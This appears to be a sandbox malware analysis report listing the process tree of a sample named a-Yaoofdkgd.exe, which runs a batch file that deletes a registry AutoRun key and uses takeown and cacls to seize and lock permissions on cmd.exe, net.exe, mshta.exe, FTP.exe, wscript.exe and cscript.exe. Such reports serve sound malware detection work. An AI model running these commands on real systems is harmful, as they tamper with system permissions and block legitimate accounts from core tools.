PID 3540 wrote to memory of 160	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 160	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 160	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 2336	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 2336	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 2336	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 2756	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 2756	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 2756	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 1528	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 1528	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 1528	3540	cmd.exe	cacls.exe
PID 4492 wrote to memory of 1316	4492	cmd.exe	sc.exe
PID 4492 wrote to memory of 1316	4492	cmd.exe	sc.exe
PID 4492 wrote to memory of 1316	4492	cmd.exe	sc.exe
PID 3540 wrote to memory of 2504	3540	cmd.exe	cmd.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

a-Yaoofdkgd.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	a-Yaoofdkgd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1"	a-Yaoofdkgd.exe

C:\Users\Admin\AppData\Local\Temp\a-Yaoofdkgd.exe
"C:\Users\Admin\AppData\Local\Temp\a-Yaoofdkgd.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wfhvyrkill$-arab.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:3540

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
3⤵
PID:5116

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cmd.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:820

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /g Administrators:f
3⤵
PID:4956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5096

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Users:r
3⤵
PID:5076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3336

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
3⤵
PID:3192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:160

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d SERVICE
3⤵
PID:2336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2756

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
3⤵
PID:1528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2504

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d "network service"
3⤵
PID:2560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3848

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g system:r
3⤵
PID:3920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3400

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
3⤵
PID:3612

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cmd.exe /a
3⤵
- Modifies file permissions
PID:1536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1244

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
3⤵
PID:1100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4292

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
3⤵
PID:4964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4336

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
3⤵
PID:4872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5092

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
3⤵
PID:2224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2040

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
3⤵
PID:4392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4648

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
3⤵
PID:1832

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
3⤵
PID:528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2228

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
3⤵
PID:2212

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2376

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /g Administrators:f
3⤵
PID:4560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3088

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Users:r
3⤵
PID:1320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2544

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Administrators:r
3⤵
PID:3024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4848

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d SERVICE
3⤵
PID:1440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5104

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssqlserver
3⤵
PID:4388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2604

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d "network service"
3⤵
PID:4836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4900

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d system
3⤵
PID:3000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4176

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
3⤵
PID:328

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net.exe /a
3⤵
- Modifies file permissions
PID:1260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3760

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
3⤵
PID:4128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4688

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
3⤵
PID:4084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3272

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
3⤵
PID:4752

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
3⤵
PID:4604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4788

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
3⤵
PID:4448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
3⤵
PID:3228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1160

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d system
3⤵
PID:1524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4000

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
3⤵
PID:1416

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net1.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3088

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /g Administrators:f
3⤵
PID:4492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3432

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Users:r
3⤵
PID:2544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2948

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Administrators:r
3⤵
PID:2332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1540

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d SERVICE
3⤵
PID:3612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4408

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssqlserver
3⤵
PID:4416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:280

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d "network service"
3⤵
PID:296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1100

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d system
3⤵
PID:4860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4292

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
3⤵
PID:5012

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net1.exe /a
3⤵
- Modifies file permissions
PID:384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5092

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
3⤵
PID:4956

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
3⤵
PID:3188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4640

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
3⤵
PID:4468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:212

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
3⤵
PID:2328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3112

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
3⤵
PID:160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1852

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
3⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4720

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d system
3⤵
PID:4040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1528

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
3⤵
PID:3984

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\mshta.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5080

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /g Administrators:f
3⤵
PID:1956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3900

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Users:r
3⤵
PID:1440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4388

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
3⤵
PID:4844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1536

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d SERVICE
3⤵
PID:4916

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
3⤵
PID:292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:5016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d "network service"
3⤵
PID:768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4188

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d system
3⤵
PID:3240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:5108

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
3⤵
PID:5088

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\mshta.exe /a
3⤵
- Modifies file permissions
PID:60

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4728

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
3⤵
PID:4732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2268

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
3⤵
PID:4764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4632

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
3⤵
PID:2408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2880

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
3⤵
PID:2228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2108

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
3⤵
PID:2032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:204

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
3⤵
PID:1416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2804

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d system
3⤵
PID:1312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4828

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
3⤵
PID:4780

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\FTP.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5044

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /g Administrators:f
3⤵
PID:4924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1612

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Users:r
3⤵
PID:3404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:268

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
3⤵
PID:1264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:696

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d SERVICE
3⤵
PID:1096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4308

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
3⤵
PID:524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4088

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d "network service"
3⤵
PID:5012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5000

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d system
3⤵
PID:1984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4696

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
3⤵
PID:4692

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\FTP.exe /a
3⤵
- Modifies file permissions
PID:4636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4772

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
3⤵
PID:216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2324

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
3⤵
PID:3316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
3⤵
PID:1292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3908

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
3⤵
PID:976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2044

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
3⤵
PID:228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2828

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
3⤵
PID:2376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4568

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d system
3⤵
PID:3892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4780

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
3⤵
PID:3432

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\wscript.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4924

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /g Administrators:f
3⤵
PID:3904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4584

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Users:r
3⤵
PID:3472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2996

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
3⤵
PID:4864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:288

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d SERVICE
3⤵
PID:4860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4360

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
3⤵
PID:4292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3248

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d "network service"
3⤵
PID:5068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1984

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d system
3⤵
PID:5092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4692

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
3⤵
PID:4644

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\wscript.exe /a
3⤵
- Modifies file permissions
PID:4080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:216

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
3⤵
PID:4548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4740

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
3⤵
PID:3912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:800

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
3⤵
PID:3896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:976

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
3⤵
PID:1924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:228

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
3⤵
PID:1320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2376

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
3⤵
PID:4824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3892

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d system
3⤵
PID:3076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3432

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
3⤵
PID:2112

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cscript.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3904

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /g Administrators:f
3⤵
PID:4416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3472

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Users:r
3⤵
PID:448

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
3⤵
PID:4964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4860

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d SERVICE
3⤵
PID:3252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4292

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
3⤵
PID:384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:5072

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d "network service"
3⤵
PID:4672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3824

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d system
3⤵
PID:4660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4644

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
3⤵
PID:3100

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cscript.exe /a
3⤵
- Modifies file permissions
PID:836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:220

